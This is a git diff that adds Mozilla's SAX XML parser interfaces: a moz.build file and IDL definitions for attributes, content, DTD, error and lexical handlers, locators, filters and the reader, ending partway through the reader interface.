diff options
Diffstat (limited to 'parser/xml')
25 files changed, 3695 insertions, 0 deletions
diff --git a/parser/xml/moz.build b/parser/xml/moz.build new file mode 100644 index 000000000..fbce634c1 --- /dev/null +++ b/parser/xml/moz.build @@ -0,0 +1,36 @@ +# -*- Mode: python; indent-tabs-mode: nil; tab-width: 40 -*- +# vim: set filetype=python: +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, You can obtain one at http://mozilla.org/MPL/2.0/. + +TEST_DIRS += ['test'] + +XPIDL_SOURCES += [ + 'nsIMozSAXXMLDeclarationHandler.idl', + 'nsISAXAttributes.idl', + 'nsISAXContentHandler.idl', + 'nsISAXDTDHandler.idl', + 'nsISAXErrorHandler.idl', + 'nsISAXLexicalHandler.idl', + 'nsISAXLocator.idl', + 'nsISAXMutableAttributes.idl', + 'nsISAXXMLFilter.idl', + 'nsISAXXMLReader.idl', +] + +XPIDL_MODULE = 'saxparser' + +EXPORTS += [ + 'nsSAXAttributes.h', + 'nsSAXLocator.h', + 'nsSAXXMLReader.h', +] + +SOURCES += [ + 'nsSAXAttributes.cpp', + 'nsSAXLocator.cpp', + 'nsSAXXMLReader.cpp', +] + +FINAL_LIBRARY = 'xul' diff --git a/parser/xml/nsIMozSAXXMLDeclarationHandler.idl b/parser/xml/nsIMozSAXXMLDeclarationHandler.idl new file mode 100644 index 000000000..2e9c0d6d6 --- /dev/null +++ b/parser/xml/nsIMozSAXXMLDeclarationHandler.idl @@ -0,0 +1,15 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#include "nsISupports.idl" + +/* This is a helper for the XML declaration in a document: + * <?xml version='1.0' encoding='UTF-8' standalone='yes'?> + */ + +[scriptable, function, uuid(c0e461cb-0e5e-284c-b97d-cffeec467eba)] +interface nsIMozSAXXMLDeclarationHandler: nsISupports { + void handleXMLDeclaration(in AString version, in AString encoding, in boolean standalone); +}; diff --git a/parser/xml/nsISAXAttributes.idl b/parser/xml/nsISAXAttributes.idl new file mode 100644 index 000000000..c9b0a8a7e --- /dev/null +++ b/parser/xml/nsISAXAttributes.idl @@ -0,0 +1,150 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Interface for a list of XML attributes. + * + * This interface allows access to a list of attributes in + * three different ways: + * + * 1.) by attribute index; + * 2.) by Namespace-qualified name; or + * 3.) by XML qualified name. + * + * The list will not contain attributes that were declared #IMPLIED + * but not specified in the start tag. It will also not contain + * attributes used as Namespace declarations (xmlns*) unless the + * http://xml.org/sax/features/namespace-prefixes feature + * is set to true (it is false by default). + * + * The order of attributes in the list is unspecified. + */ +[scriptable, uuid(e347005e-6cd0-11da-be43-001422106990)] +interface nsISAXAttributes : nsISupports +{ + /** + * Look up the index of an attribute by Namespace name. + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. + * @param localName The attribute's local name. + * @return The index of the attribute, or -1 + * if it does not appear in the list. 
+ */ + long getIndexFromName(in AString uri, in AString localName); + + /** + * Look up the index of an attribute by XML qualified name. + * @param qName The qualified name. + * @return The index of the attribute, or -1 + * if it does not appear in the list. + */ + long getIndexFromQName(in AString qName); + + /** + * Return the number of attributes in the list. Once you know the + * number of attributes, you can iterate through the list. + * + * @return The number of attributes in the list. + */ + readonly attribute long length; + + /** + * Look up an attribute's local name by index. + * @param index The attribute index (zero-based). + * @return The local name, or null if the index is out of range. + */ + AString getLocalName(in unsigned long index); + + /** + * Look up an attribute's XML qualified name by index. + * @param index The attribute index (zero-based). + * @return The XML qualified name, or the empty string if none is + * available, or null if the index is out of range. + */ + AString getQName(in unsigned long index); + + /** + * Look up an attribute's type by index. The attribute type is one + * of the strings "CDATA", "ID", "IDREF", "IDREFS", "NMTOKEN", + * "NMTOKENS", "ENTITY", "ENTITIES", or "NOTATION" (always in upper + * case). If the parser has not read a declaration for the + * attribute, or if the parser does not report attribute types, then + * it must return the value "CDATA" as stated in the XML 1.0 + * Recommendation (clause 3.3.3, "Attribute-Value + * Normalization"). For an enumerated attribute that is not a + * notation, the parser will report the type as "NMTOKEN". + * + * @param index The attribute index (zero-based). + * @return The attribute's type as a string, or null if the index is + * out of range. + */ + AString getType(in unsigned long index); + + /** + * Look up an attribute's type by Namespace name. + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. 
+ * @param localName The attribute's local name. + * @return The attribute type as a string, or null if the attribute + * is not in the list. + */ + AString getTypeFromName(in AString uri, in AString localName); + + /** + * Look up an attribute's type by XML qualified name. + * @param qName The qualified name. + * @return The attribute type as a string, or null if the attribute + * is not in the list. + */ + AString getTypeFromQName(in AString qName); + + /** + * Look up an attribute's Namespace URI by index. + * @param index The attribute index (zero-based). + * @return The Namespace URI, or the empty string if none is available, + * or null if the index is out of range. + */ + AString getURI(in unsigned long index); + + /** + * Look up an attribute's value by index. If the attribute value is + * a list of tokens (IDREFS, ENTITIES, or NMTOKENS), the tokens will + * be concatenated into a single string with each token separated by + * a single space. + * + * @param index The attribute index (zero-based). + * @return The attribute's value as a string, or null if the index is + * out of range. + */ + AString getValue(in unsigned long index); + + /** + * Look up an attribute's value by Namespace name. If the attribute + * value is a list of tokens (IDREFS, ENTITIES, or NMTOKENS), the + * tokens will be concatenated into a single string with each token + * separated by a single space. + * + * @param uri The Namespace URI, or the empty string + * if the name has no Namespace URI. + * @param localName The attribute's local name. + * @return The attribute's value as a string, or null if the attribute is + * not in the list. + */ + AString getValueFromName(in AString uri, in AString localName); + + /** + * Look up an attribute's value by XML qualified (prefixed) name. + * If the attribute value is a list of tokens (IDREFS, ENTITIES, or + * NMTOKENS), the tokens will be concatenated into a single string + * with each token separated by a single space. 
+ * + * @param qName The qualified (prefixed) name. + * @return The attribute's value as a string, or null if the attribute is + * not in the list. + */ + AString getValueFromQName(in AString qName); +}; diff --git a/parser/xml/nsISAXContentHandler.idl b/parser/xml/nsISAXContentHandler.idl new file mode 100644 index 000000000..43b7e48c5 --- /dev/null +++ b/parser/xml/nsISAXContentHandler.idl @@ -0,0 +1,225 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +interface nsISAXAttributes; + +/** + * Receive notification of the logical content of a document. + * + * This is the main interface that most SAX applications implement: if + * the application needs to be informed of basic parsing events, it + * implements this interface and registers an instance with the SAX + * parser. The parser uses the instance to report basic + * document-related events like the start and end of elements and + * character data. + * + * The order of events in this interface is very important, and + * mirrors the order of information in the document itself. For + * example, all of an element's content (character data, processing + * instructions, and/or subelements) will appear, in order, between + * the startElement event and the corresponding endElement event. + */ +[scriptable, uuid(2a99c757-dfee-4806-bff3-f721440412e0)] +interface nsISAXContentHandler : nsISupports +{ + /** + * Receive notification of the beginning of a document. + * + * The SAX parser will invoke this method only once, before any + * other event callbacks. + */ + void startDocument(); + + /** + * Receive notification of the end of a document. 
+ * + * There is an apparent contradiction between the documentation for + * this method and the documentation for ErrorHandler.fatalError(). + * Until this ambiguity is resolved in a future major release, + * clients should make no assumptions about whether endDocument() + * will or will not be invoked when the parser has reported a + * fatalError() or thrown an exception. + * + * The SAX parser will invoke this method only once, and it will be + * the last method invoked during the parse. The parser shall not + * invoke this method until it has either abandoned parsing (because + * of an unrecoverable error) or reached the end of input. + */ + void endDocument(); + + /** + * Receive notification of the beginning of an element. + * + * The Parser will invoke this method at the beginning of every + * element in the XML document; there will be a corresponding + * endElement event for every startElement event (even when the + * element is empty). All of the element's content will be reported, + * in order, before the corresponding endElement event. + * + * This event allows up to three name components for each element: + * + * 1.) the Namespace URI; + * 2.) the local name; and + * 3.) the qualified (prefixed) name. + * + * Any or all of these may be provided, depending on the values of + * the http://xml.org/sax/features/namespaces and the + * http://xml.org/sax/features/namespace-prefixes properties: + * + * The Namespace URI and local name are required when the namespaces + * property is true (the default), and are optional when the + * namespaces property is false (if one is specified, both must be); + * + * The qualified name is required when the namespace-prefixes + * property is true, and is optional when the namespace-prefixes + * property is false (the default). + * + * Note that the attribute list provided will contain only + * attributes with explicit values (specified or defaulted): + * #IMPLIED attributes will be omitted. 
The attribute list will + * contain attributes used for Namespace declarations (xmlns* + * attributes) only if the + * http://xml.org/sax/features/namespace-prefixes property is true + * (it is false by default, and support for a true value is + * optional). + * + * @param uri the Namespace URI, or the empty string if the + * element has no Namespace URI or if Namespace + * processing is not being performed + * @param localName the local name (without prefix), or the + * empty string if Namespace processing is not being + * performed + * @param qName the qualified name (with prefix), or the + * empty string if qualified names are not available + * @param attributes the attributes attached to the element. If + * there are no attributes, it shall be an empty + * SAXAttributes object. The value of this object after + * startElement returns is undefined + */ + void startElement(in AString uri, in AString localName, + in AString qName, in nsISAXAttributes attributes); + + /** + * Receive notification of the end of an element. + * + * The SAX parser will invoke this method at the end of every + * element in the XML document; there will be a corresponding + * startElement event for every endElement event (even when the + * element is empty). + * + * For information on the names, see startElement. + * + * @param uri the Namespace URI, or the empty string if the + * element has no Namespace URI or if Namespace + * processing is not being performed + * @param localName the local name (without prefix), or the + * empty string if Namespace processing is not being + * performed + * @param qName the qualified XML name (with prefix), or the + * empty string if qualified names are not available + */ + void endElement(in AString uri, in AString localName, in AString qName); + + /** + * Receive notification of character data. + * + * The Parser will call this method to report each chunk of + * character data.
SAX parsers may return all contiguous character + * data in a single chunk, or they may split it into several chunks; + * however, all of the characters in any single event must come from + * the same external entity so that the Locator provides useful + * information. + * + * Note that some parsers will report whitespace in element + * content using the ignorableWhitespace method rather than this one + * (validating parsers must do so). + * + * @param value the characters from the XML document + */ + void characters(in AString value); + + /** + * Receive notification of a processing instruction. + * + * The Parser will invoke this method once for each processing + * instruction found: note that processing instructions may occur + * before or after the main document element. + * + * A SAX parser must never report an XML declaration (XML 1.0, + * section 2.8) or a text declaration (XML 1.0, section 4.3.1) using + * this method. + * + * @param target the processing instruction target + * @param data the processing instruction data, or null if + * none was supplied. The data does not include any + * whitespace separating it from the target + */ + void processingInstruction(in AString target, in AString data); + + /** + * Receive notification of ignorable whitespace in element content. + * + * Validating Parsers must use this method to report each chunk of + * whitespace in element content (see the W3C XML 1.0 + * recommendation, section 2.10): non-validating parsers may also + * use this method if they are capable of parsing and using content + * models. + * + * SAX parsers may return all contiguous whitespace in a single + * chunk, or they may split it into several chunks; however, all of + * the characters in any single event must come from the same + * external entity, so that the Locator provides useful information. 
+ * + * @param whitespace the characters from the XML document + */ + void ignorableWhitespace(in AString whitespace); + + /** + * Begin the scope of a prefix-URI Namespace mapping. + * + * The information from this event is not necessary for normal + * Namespace processing: the SAX XML reader will automatically + * replace prefixes for element and attribute names when the + * http://xml.org/sax/features/namespaces feature is + * true (the default). + * + * There are cases, however, when applications need to use prefixes + * in character data or in attribute values, where they cannot + * safely be expanded automatically; the start/endPrefixMapping + * event supplies the information to the application to expand + * prefixes in those contexts itself, if necessary. + * + * Note that start/endPrefixMapping events are not guaranteed to be + * properly nested relative to each other: all startPrefixMapping + * events will occur immediately before the corresponding + * startElement event, and all endPrefixMapping events will occur + * immediately after the corresponding endElement event, but their + * order is not otherwise guaranteed. + * + * There should never be start/endPrefixMapping events for the + * "xml" prefix, since it is predeclared and immutable. + * + * @param prefix The Namespace prefix being declared. An empty + * string is used for the default element namespace, + * which has no prefix. + * @param uri The Namespace URI the prefix is mapped to. + */ + void startPrefixMapping(in AString prefix, in AString uri); + + /** + * End the scope of a prefix-URI mapping. + * + * See startPrefixMapping for details. These events will always + * occur immediately after the corresponding endElement event, but + * the order of endPrefixMapping events is not otherwise guaranteed. + * + * @param prefix The prefix that was being mapped. This is the empty + * string when a default mapping scope ends. 
+ */ + void endPrefixMapping(in AString prefix); + //XXX documentLocator +}; diff --git a/parser/xml/nsISAXDTDHandler.idl b/parser/xml/nsISAXDTDHandler.idl new file mode 100644 index 000000000..b4cb51d1b --- /dev/null +++ b/parser/xml/nsISAXDTDHandler.idl @@ -0,0 +1,77 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Receive notification of basic DTD-related events. + * + * If a SAX application needs information about notations and + * unparsed entities, then the application implements this interface + * and registers an instance with the SAX parser using the parser's + * setDTDHandler method. The parser uses the instance to report + * notation and unparsed entity declarations to the application. + * + * Note that this interface includes only those DTD events that the + * XML recommendation requires processors to report: notation and + * unparsed entity declarations. + * + * The SAX parser may report these events in any order, regardless + * of the order in which the notations and unparsed entities were + * declared; however, all DTD events must be reported after the + * document handler's startDocument event, and before the first + * startElement event. (If the LexicalHandler is used, these events + * must also be reported before the endDTD event.) + */ +[scriptable, uuid(4d01f225-6cc5-11da-be43-001422106990)] +interface nsISAXDTDHandler : nsISupports { + + /** + * Receive notification of a notation declaration event. + * + * It is up to the application to record the notation for later + * reference, if necessary; notations may appear as attribute values + * and in unparsed entity declarations, and are sometimes used with + * processing instruction target names.
+ * + * At least one of publicId and systemId must be non-null. If a + * system identifier is present, and it is a URL, the SAX parser + * must resolve it fully before passing it to the application + * through this event. + * + * There is no guarantee that the notation declaration will be + * reported before any unparsed entities that use it. + * + * @param name The notation name. + * @param publicId The notation's public identifier, or null if none was + * given. + * @param systemId The notation's system identifier, or null if none was + * given. + */ + void notationDecl(in AString name, + in AString publicId, + in AString systemId); + + /** + * Receive notification of an unparsed entity declaration event. + * + * Note that the notation name corresponds to a notation reported + * by the notationDecl event. It is up to the application to record + * the entity for later reference, if necessary; unparsed entities + * may appear as attribute values. + * + * If the system identifier is a URL, the parser must resolve it + * fully before passing it to the application. + * + * @param name The unparsed entity's name. + * @param publicId The entity's public identifier, or null if none was + * given. + * @param systemId The entity's system identifier, or null if none was + * given. + * @param notationName The name of the associated notation. + */ + void unparsedEntityDecl(in AString name, in AString publicId, + in AString systemId, in AString notationName); +}; diff --git a/parser/xml/nsISAXErrorHandler.idl b/parser/xml/nsISAXErrorHandler.idl new file mode 100644 index 000000000..ea8af79ce --- /dev/null +++ b/parser/xml/nsISAXErrorHandler.idl @@ -0,0 +1,95 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. 
*/ + +#include "nsISupports.idl" + +interface nsISAXLocator; + +/** + * Basic interface for SAX error handlers. + * + * If a SAX application needs to implement customized error + * handling, it must implement this interface and then register an + * instance with the XML reader. The parser will then report all + * errors and warnings through this interface. + * + * WARNING: If an application does not register an ErrorHandler, + * XML parsing errors will go unreported. In order to detect validity + * errors, an ErrorHandler that does something with error() calls must + * be registered. + * + */ +[scriptable, uuid(e02b6693-6cca-11da-be43-001422106990)] +interface nsISAXErrorHandler: nsISupports { + + /** + * Receive notification of a recoverable error. + * + * This corresponds to the definition of "error" in section 1.2 + * of the W3C XML 1.0 Recommendation. For example, a validating + * parser would use this callback to report the violation of a + * validity constraint. The default behaviour is to take no + * action. + * + * The SAX parser must continue to provide normal parsing events + * after invoking this method: it should still be possible for the + * application to process the document through to the end. If the + * application cannot do so, then the parser should report a fatal + * error even if the XML recommendation does not require it to do + * so. + * + * Filters may use this method to report other, non-XML errors as + * well. + * + * @param locator The locator object for the error (may be null). + * @param error The error message. + */ + void error(in nsISAXLocator locator, in AString error); + + /** + * Receive notification of a non-recoverable error. + * + * There is an apparent contradiction between the documentation + * for this method and the documentation for + * ContentHandler.endDocument(). 
Until this ambiguity is resolved in + * a future major release, clients should make no assumptions about + * whether endDocument() will or will not be invoked when the parser + * has reported a fatalError() or thrown an exception. + * + * This corresponds to the definition of "fatal error" in section + * 1.2 of the W3C XML 1.0 Recommendation. For example, a parser + * would use this callback to report the violation of a + * well-formedness constraint. + * + * The application must assume that the document is unusable + * after the parser has invoked this method, and should continue (if + * at all) only for the sake of collecting additional error + * messages: in fact, SAX parsers are free to stop reporting any + * other events once this method has been invoked. + * + * @param locator The locator object for the error (may be null). + * @param error The error message. + */ + void fatalError(in nsISAXLocator locator, in AString error); + + /** + * Receive notification of a warning. + * + * SAX parsers will use this method to report conditions that are + * not errors or fatal errors as defined by the XML + * recommendation. The default behaviour is to take no action. + * + * The SAX parser must continue to provide normal parsing events + * after invoking this method: it should still be possible for the + * application to process the document through to the end. + * + * Filters may use this method to report other, non-XML warnings + * as well. + * + * @param locator The locator object for the warning (may be null). + * @param error The warning message. 
+ */ + void ignorableWarning(in nsISAXLocator locator, in AString error); +}; diff --git a/parser/xml/nsISAXLexicalHandler.idl b/parser/xml/nsISAXLexicalHandler.idl new file mode 100644 index 000000000..ed50de2b7 --- /dev/null +++ b/parser/xml/nsISAXLexicalHandler.idl @@ -0,0 +1,118 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * SAX2 extension handler for lexical events. + * + * This is an extension handler for SAX2 to provide lexical + * information about an XML document, such as comments and CDATA + * section boundaries. + * + * The events in the lexical handler apply to the entire document, + * not just to the document element, and all lexical handler events + * must appear between the content handler's startDocument and + * endDocument events. + */ +[scriptable, uuid(23c26a56-adff-440c-8caf-95c2dc2e399b)] +interface nsISAXLexicalHandler : nsISupports { + + /** + * Report an XML comment anywhere in the document. + * + * This callback will be used for comments inside or outside the + * document element, including comments in the external DTD subset + * (if read). Comments in the DTD must be properly nested inside + * start/endDTD and start/endEntity events (if used). + * + * @param chars The characters in the comment. + */ + void comment(in AString chars); + + /** + * Report the start of DTD declarations, if any. + * + * This method is intended to report the beginning of the + * DOCTYPE declaration; if the document has no DOCTYPE declaration, + * this method will not be invoked. + * + * All declarations reported through DTDHandler or DeclHandler + * events must appear between the startDTD and endDTD events. 
+ * Declarations are assumed to belong to the internal DTD subset + * unless they appear between startEntity and endEntity events. + * Comments and processing instructions from the DTD should also be + * reported between the startDTD and endDTD events, in their + * original order of (logical) occurrence; they are not required to + * appear in their correct locations relative to DTDHandler or + * DeclHandler events, however. + * + * Note that the start/endDTD events will appear within the + * start/endDocument events from ContentHandler and before the first + * startElement event. + * + * @param name The document type name. + * @param publicId The declared public identifier for the + * external DTD subset, or null if none was declared. + * @param systemId The declared system identifier for the + * external DTD subset, or null if none was declared. + * (Note that this is not resolved against the document + * base URI.) + */ + void startDTD(in AString name, in AString publicId, in AString systemId); + + /** + * Report the end of DTD declarations. + * + * This method is intended to report the end of the + * DOCTYPE declaration; if the document has no DOCTYPE declaration, + * this method will not be invoked. + */ + void endDTD(); + + /** + * Report the start of a CDATA section. + * + * The contents of the CDATA section will be reported through the + * regular characters event; this event is intended only to report + * the boundary. + */ + void startCDATA(); + + /** + * Report the end of a CDATA section. + */ + void endCDATA(); + + /** + * Report the beginning of some internal and external XML entities. + * + * Because of the streaming event model that SAX uses, some + * entity boundaries cannot be reported under any circumstances: + * + * 1.) general entities within attribute values + * 2.) parameter entities within declarations + * + * These will be silently expanded, with no indication of where + * the original entity boundaries were. 
+ * + * Note also that the boundaries of character references (which + * are not really entities anyway) are not reported. + * + * All start/endEntity events must be properly nested. + * + * @param name The name of the entity. If it is a parameter + * entity, the name will begin with '%', and if it is the + * external DTD subset, it will be "[dtd]". + */ + void startEntity(in AString name); + + /** + * Report the end of an entity. + * + * @param name The name of the entity that is ending. + */ + void endEntity(in AString name); +}; diff --git a/parser/xml/nsISAXLocator.idl b/parser/xml/nsISAXLocator.idl new file mode 100644 index 000000000..a5808313f --- /dev/null +++ b/parser/xml/nsISAXLocator.idl @@ -0,0 +1,89 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" + +/** + * Interface for associating a SAX event with a document location. + * + * Note that the results returned by the object will be valid only + * during the scope of each callback method: the application will + * receive unpredictable results if it attempts to use the locator at + * any other time, or after parsing completes. + */ +[scriptable, uuid(7a307c6c-6cc9-11da-be43-001422106990)] +interface nsISAXLocator: nsISupports { + + /** + * Return the column number where the current document event ends. + * + * Warning: The return value from the method is intended only as an + * approximation for the sake of diagnostics; it is not intended to + * provide sufficient information to edit the character content of + * the original XML document. 
For example, when lines contain + * combining character sequences, wide characters, surrogate pairs, + * or bi-directional text, the value may not correspond to the + * column in a text editor's display. + * + * The return value is an approximation of the column number in the + * document entity or external parsed entity where the markup + * triggering the event appears. + * + * If possible, the SAX driver should provide the line position of + * the first character after the text associated with the document + * event. The first column in each line is column 1. + * + * @return The column number, or -1 if none is available. + */ + readonly attribute long columnNumber; + + /** + * Return the line number where the current document event ends. + * Lines are delimited by line ends, which are defined in the XML + * specification. + * + * Warning: The return value from the method is intended only as an + * approximation for the sake of diagnostics; it is not intended to + * provide sufficient information to edit the character content of + * the original XML document. In some cases, these "line" numbers + * match what would be displayed as columns, and in others they may + * not match the source text due to internal entity expansion. + * + * The return value is an approximation of the line number in the + * document entity or external parsed entity where the markup + * triggering the event appears. + * + * If possible, the SAX driver should provide the line position of + * the first character after the text associated with the document + * event. The first line is line 1. + * + * @return The line number, or -1 if none is available. + */ + readonly attribute long lineNumber; + + /** + * Return the public identifier for the current document event. + * + * The return value is the public identifier of the document entity + * or of the external parsed entity in which the markup triggering + * the event appears. 
+ * + * @return A string containing the public identifier, or + * null if none is available. + */ + readonly attribute AString publicId; + + /** + * Return the system identifier for the current document event. + * + * The return value is the system identifier of the document entity + * or of the external parsed entity in which the markup triggering + * the event appears. + * + * @return A string containing the system identifier, or null + * if none is available. + */ + readonly attribute AString systemId; +}; diff --git a/parser/xml/nsISAXMutableAttributes.idl b/parser/xml/nsISAXMutableAttributes.idl new file mode 100644 index 000000000..c3c205005 --- /dev/null +++ b/parser/xml/nsISAXMutableAttributes.idl @@ -0,0 +1,127 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" +#include "nsISAXAttributes.idl" + +/** + * This interface extends the nsISAXAttributes interface with + * manipulators so that the list can be modified or reused. + */ +[scriptable, uuid(8b1de83d-cebb-49fa-8245-c0fe319eb7b6)] +interface nsISAXMutableAttributes : nsISAXAttributes { + + /** + * Add an attribute to the end of the list. + * + * For the sake of speed, this method does no checking + * to see if the attribute is already in the list: that is + * the responsibility of the application. + * + * @param uri The Namespace URI, or the empty string if + * none is available or Namespace processing is not + * being performed. + * @param localName The local name, or the empty string if + * Namespace processing is not being performed. + * @param qName The qualified (prefixed) name, or the empty string + * if qualified names are not available. + * @param type The attribute type as a string. + * @param value The attribute value. 
+ */ + void addAttribute(in AString uri, + in AString localName, + in AString qName, + in AString type, + in AString value); + + /** + * Clear the attribute list for reuse. + */ + void clear(); + + /** + * Remove an attribute from the list. + * + * @param index The index of the attribute (zero-based). + */ + void removeAttribute(in unsigned long index); + + /** + * Set the attributes list. This method will clear any attributes in + * the list before adding the attributes from the argument. + * + * @param attributes The attributes object to populate the + * list with. + */ + void setAttributes(in nsISAXAttributes attributes); + + /** + * Set an attribute in the list. + * + * For the sake of speed, this method does no checking for name + * conflicts or well-formedness: such checks are the responsibility + * of the application. + * + * @param index The index of the attribute (zero-based). + * @param uri The Namespace URI, or the empty string if + * none is available or Namespace processing is not + * being performed. + * @param localName The local name, or the empty string if + * Namespace processing is not being performed. + * @param qName The qualified name, or the empty string + * if qualified names are not available. + * @param type The attribute type as a string. + * @param value The attribute value. + */ + void setAttribute(in unsigned long index, + in AString uri, + in AString localName, + in AString qName, + in AString type, + in AString value); + + /** + * Set the local name of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param localName The attribute's local name, or the empty + * string for none. + */ + void setLocalName(in unsigned long index, in AString localName); + + /** + * Set the qualified name of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param qName The attribute's qualified name, or the empty + * string for none.
+ */ + void setQName(in unsigned long index, in AString qName); + + /** + * Set the type of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param type The attribute's type. + */ + void setType(in unsigned long index, in AString type); + + /** + * Set the Namespace URI of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param uri The attribute's Namespace URI, or the empty + * string for none. + */ + void setURI(in unsigned long index, in AString uri); + + /** + * Set the value of a specific attribute. + * + * @param index The index of the attribute (zero-based). + * @param value The attribute's value. + */ + void setValue(in unsigned long index, in AString value); +}; diff --git a/parser/xml/nsISAXXMLFilter.idl b/parser/xml/nsISAXXMLFilter.idl new file mode 100644 index 000000000..44b637db9 --- /dev/null +++ b/parser/xml/nsISAXXMLFilter.idl @@ -0,0 +1,29 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsISupports.idl" +#include "nsISAXXMLReader.idl" + +/** + * Interface for an XML filter. + * + * An XML filter is like an XML reader, except that it obtains its + * events from another XML reader rather than a primary source like an + * XML document or database. Filters can modify a stream of events as + * they pass on to the final application. + */ +[scriptable, uuid(77a22cf0-6cdf-11da-be43-001422106990)] +interface nsISAXXMLFilter : nsISAXXMLReader { + + /** + * The parent reader. + * + * Allows the application to query the parent reader (which may be + * another filter). It is generally a bad idea to perform any + * operations on the parent reader directly: they should all pass + * through this filter. 
+ */ + attribute nsISAXXMLReader parent; +}; diff --git a/parser/xml/nsISAXXMLReader.idl b/parser/xml/nsISAXXMLReader.idl new file mode 100644 index 000000000..8dedcc3f6 --- /dev/null +++ b/parser/xml/nsISAXXMLReader.idl @@ -0,0 +1,207 @@ +/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */ +/* This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ + +#include "nsIStreamListener.idl" + +interface nsIInputStream; +interface nsIRequestObserver; +interface nsIURI; + +interface nsISAXContentHandler; +interface nsISAXDTDHandler; +interface nsISAXEntityResolver; +interface nsISAXErrorHandler; +interface nsISAXLexicalHandler; +interface nsIMozSAXXMLDeclarationHandler; + +/** + * Interface for reading an XML document using callbacks. + * + * nsISAXXMLReader is the interface that an XML parser's SAX2 + * driver must implement. This interface allows an application to set + * and query features and properties in the parser, to register event + * handlers for document processing, and to initiate a document + * parse. + */ +[scriptable, uuid(5b1de802-9091-454f-9972-5753c0d0c70e)] +interface nsISAXXMLReader : nsIStreamListener { + + /** + * The base URI. + */ + attribute nsIURI baseURI; + + /** + * If the application does not register a content handler, all + * content events reported by the SAX parser will be silently + * ignored. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXContentHandler contentHandler; + + /** + * If the application does not register a DTD handler, all DTD + * events reported by the SAX parser will be silently ignored. 
+ * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXDTDHandler dtdHandler; + + + /** + * If the application does not register an error handler, all + * error events reported by the SAX parser will be silently ignored; + * however, normal processing may not continue. It is highly + * recommended that all SAX applications implement an error handler + * to avoid unexpected bugs. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXErrorHandler errorHandler; + + /** + * A handler for the (optional) XML declaration of a document. + * <?xml version='1.0'?> + * + * @note This is not part of the SAX standard. + */ + attribute nsIMozSAXXMLDeclarationHandler declarationHandler; + + /** + * If the application does not register a lexical handler, all + * lexical events (e.g. startDTD) reported by the SAX parser will be + * silently ignored. + * + * Applications may register a new or different handler in the + * middle of a parse, and the SAX parser must begin using the new + * handler immediately. + */ + attribute nsISAXLexicalHandler lexicalHandler; + + /** + * Set the value of a feature flag. + * + * The feature name is any fully-qualified URI. It is possible + * for an XMLReader to expose a feature value but to be unable to + * change the current value. Some feature values may be immutable + * or mutable only in specific contexts, such as before, during, or + * after a parse. + * + * All XMLReaders are required to support setting + * http://xml.org/sax/features/namespaces to true and + * http://xml.org/sax/features/namespace-prefixes to false. + * + * @param name String flag for a parser feature. + * @param value Turn the feature on/off. 
